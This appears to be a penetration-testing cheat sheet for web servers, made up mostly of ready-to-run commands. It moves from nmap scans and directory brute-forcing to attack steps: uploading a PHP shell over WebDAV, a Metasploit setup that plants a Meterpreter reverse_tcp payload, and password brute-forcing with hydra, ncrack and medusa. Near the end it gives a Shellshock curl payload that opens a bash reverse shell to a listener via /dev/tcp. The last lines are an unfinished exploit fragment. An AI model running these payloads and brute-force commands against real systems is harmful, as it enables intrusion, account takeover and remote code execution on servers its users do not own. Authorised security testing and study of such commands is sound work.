Web enumeration means to look out info about services running on port, versions, languages, directories and more.
| Service | Port No. | Protocol |
|---|---|---|
| HTTP | 80,8080,8081,8000 | TCP |
| HTTPS | 443,8443,4443 | TCP |
| Tomcat Startup | 8080 | TCP |
| Tomcat Startup (SSL) | 8443 | TCP |
| Tomcat Shutdown | 8005 | TCP |
| Tomcat AJP Connector | 8009 | TCP |
| Glassfish HTTP | 8080 | TCP |
| Glassfish HTTPS | 8181 | TCP |
| Glassfish Admin Server | 4848 | TCP |
| Jetty | 8080 | TCP |
| Jonas Admin Console | 9000 | TCP |
-Pn: Treat all hosts as online -- skip host discovery
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-p <port ranges>: Only scan specified ports
-sV: Probe open ports to determine service/version info
-sC: equivalent to --script=default
--script=<Lua scripts>: <Lua scripts> is a comma separated list of
directories, script-files or script-categories
-O: Enable OS detection
-oA <basename>: Output in the three major formats at once
-v: Increase verbosity level (use -vv or more for greater effect)
-A: Enable OS detection, version detection, script scanning, and traceroute
# nmap -sT -v -p- $IP
# nmap -sT -v -p- -oA allports $IP ##Save Output in File
# nmap -Pn -sT -v -p- $IP
# nmap -sT -sV -sC -A -O -v -p 80,443 $IP
# nmap -Pn -sT -sV -sC -A -O -v -p 80,443 $IP
# ls /usr/share/nmap/scripts/ | grep http
# nmap -sT -sV -v -p 80,443 --script=http-enum.nse $IP
# nmap -sT -sV -v -p 80,443 --script=http-php-version.nse $IP
# nmap -sT -sV -v -p 80,443 --script=http-put.nse $IP
# nmap -sT -sV -v -p 80,443 --script=http-shellshock.nse $IP
# nmap -sT -sV -v -p 80,443 --script=http-slowloris.nse $IP
# nmap -sT -sV -v -p 80,443 --script=http-vhosts.nse $IP
Diresearch is an advanced tool to Bruteforce directory on your web machines.
# dirsearch -u http://www.example.com/
# dirsearch -u http://www.example.com/ -t 100
# dirsearch -u http://www.example.com/ -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# dirsearch -u http://www.example.com/ -t 100 -e “php,html,aspx,jsp” -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# dirsearch -u http://www.example.com/ -o result.txt
-u - Target-Url
-t - Number of threads
-w - Denotes the path of directory list
-e - Extensions ( php,jsp,bak,html,png,jpeg )
-o - Output file
# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com
# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com -t 50
# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com -x php,txt,bak
# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://www.example.com -o /tmp/result.txt
-u - Target-Url
-w - Denotes the path of directory list
-t - Number of threads
-x - Extensions ( php,jsp,bak,html,png,jpeg )
-o - Output file
You can also find sub-domains with gobuster
# gobuster vhost -u http://example.name -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
| Method | Syntax | Description |
|---|---|---|
| GET | GET /index.html | GET method requests a representation of the specified resource. Requests using GET should only retrieve data. |
| HEAD | HEAD /index.html | HEAD method requests the headers that would be returned if the HEAD request's URL was instead requested with the HTTP GET method. |
| POST | POST /test | POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server. |
| PUT | PUT /new.html HTTP/1.1 | The PUT method replaces all current representations of the target resource with the request payload. |
| DELETE | DELETE /file.html HTTP/1.1 | DELETE request method deletes the specified resource. |
| CONNECT | CONNECT www.example.com:443 HTTP/1.1 | CONNECT method starts two-way communications with the requested resource. It can be used to open a tunnel. |
| OPTIONS | OPTIONS /index.html HTTP/1.1 | OPTIONS method requests permitted communication options for a given URL or server. A client can specify a URL with this method, or an asterisk (*) to refer to the entire server. |
| TRACE | TRACE /index.html | TRACE method performs a message loop-back test along the path to the target resource, providing a useful debugging mechanism. |
| PATCH | PATCH /file.txt HTTP/1.1 | PATCH request method applies partial modifications to a resource. |
# nmap -sT -sV -v -p 80,443 --script=http-methods.nse $IP
# nmap -sT -sV -v -p 80,443 --script=http-method-tamper.nse $IP
# nmap -p 80 --script http-methods --script-args http-methods.url-path='/index.php' $IP
# nmap -p 80 --script http-methods --script-args http-method.test-all ='/192.168.1.100' 192.168.1.100
# nmap -p 80 192.168.1.100 --script http-put --script-args http-put.url='/dav/test.php',http-put.file='/dev/shm/test.php'
# nc 192.168.1.100 80
HEAD /admin HTTP/1.1
# nc 192.168.1.100 80
TRACE / HTTP/1.1
# nc 192.168.1.100 80
OPTIONS http://192.168.1.100 / HTTP/1.0
# curl -X GET 192.168.1.100
# curl -X OPTIONS 192.168.1.100
# curl -X OPTIONS 192.168.1.100/webdev -v
# curl -X POST 192.168.1.100
# curl -X PUT 192.168.1.100/uploads
# curl -X DELETE 192.168.1.100
# curl 192.168.1.100/uploads --upload-file demo.txt
# curl -I 192.168.1.100
# nikto -h 192.168.1.100
# davtest --help
# davtest -url http://192.168.1.100/dav/
# cadaver --help
# cadaver http://192.168.1.100/dav/
put /dev/shm/shell.php
# msfconsole
msf> use auxiliary/scanner/http/http_put
msf>auxiliary (http_put) > set rhosts 192.168.1.100
msf>auxiliary (http_put) > set payload php/meterpreter/reverse_tcp
msf>auxiliary (http_put) > set path /dav/
msf>auxiliary (http_put) > set filename meter.php
msf>auxiliary (http_put) > set filedata file://root/Desktop/meter.php
msf>auxiliary (http_put) > exploit
HTTP Basic Authentication implementation is the tehnique for enforce access control of the web server from unauthorised access, It doesn't required cookies.
Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast. This tool gives researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system
# hydra -l admin -P /usr/share/wordlists/rockyou.txt http-head://www.example.com/
# hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt http-head://www.example.com
# hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt http-head://www.example.com
# hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt http-get://www.example.com
# hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/100k-most-used-passwords-NCSC.txt http-get://www.example.com
# hydra -L user.txt -P pass.txt 192.168.1.100 http-get
-L denotes the path of username List
-P denotes the path of Password List
-l represent the username
-p represent the password
Ncrack is an open source tool for network authentication cracking. It was designed for high-speed parallel cracking using a dynamic engine that can adapt to different network situations. Ncrack can also be extensively fine-tuned for special cases, though the default parameters are generic enough to cover almost every situation. It is built on a modular architecture that allows for easy extension to support additional protocols. Ncrack is designed for companies and security professionals to audit large networks for default or weak passwords in a rapid and reliable way. It can also be used to conduct fairly sophisticated and intensive brute force attacks against individual services.
# ncrack -v -U user.txt -P pass.txt http://192.168.1.100
# ncrack -v --user user.txt --pass pass.txt http://192.168.1.100
# ncrack -v -user admin -P pass.txt http://192.168.1.100
# ncrack -v -user admin,administrator -p pass,password,pass@123 http://192.168.1.100
# ncrack -v -user admin,administrator -P pass.txt http://192.168.1.100
-v Verbosity
-U Denotes the path of user list
-P Denotes the path of password list
-user Denotes the username with comma seprated
-pass Denotes the password with comma seprated
-T[0-5] set timing template
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items to some of the key features of this application:
# medusa -h 192.168.1.100 -U user.txt -p p@$$w0rd -M http -f
# medusa -h 192.168.1.100 -u admin -P pass.txt -M http -f
# medusa -h 192.168.1.100 -U user.txt -P pass.txt -M http -f
# medusa -h 192.168.1.100 -c combo.txt -M http -f
[-c Combo files are colon separated and in the following format: host:user:password]
-h host or url
-U Denotes the path of user list
-P Denotes the path of passowrd list
-u Denotes the username with comma seprated
-p Denotes the password with comma seprated
-c Denotes the combo file colon seprated
-M module name to be execute.
# curl -v -H "user-agent: () { :; }; echo; /bin/bash -c 'echo 'Vulnerable\ to\ ShellShock''" http://example.com/cgi-dir/cgiscript
# nmap -v -sT -sV -p 80 --script http-shellshock.nse --script-args http-shellshock.uri='/cgi-dir/cgiscript' $IP
Start listener for reverse shell
# nc -nlvp 443
# curl -v -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.10/443 0>&1'" http://example.com/cgi-dir/script
Edit Exploit - Mention Vulnerable Cgi-script Here
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]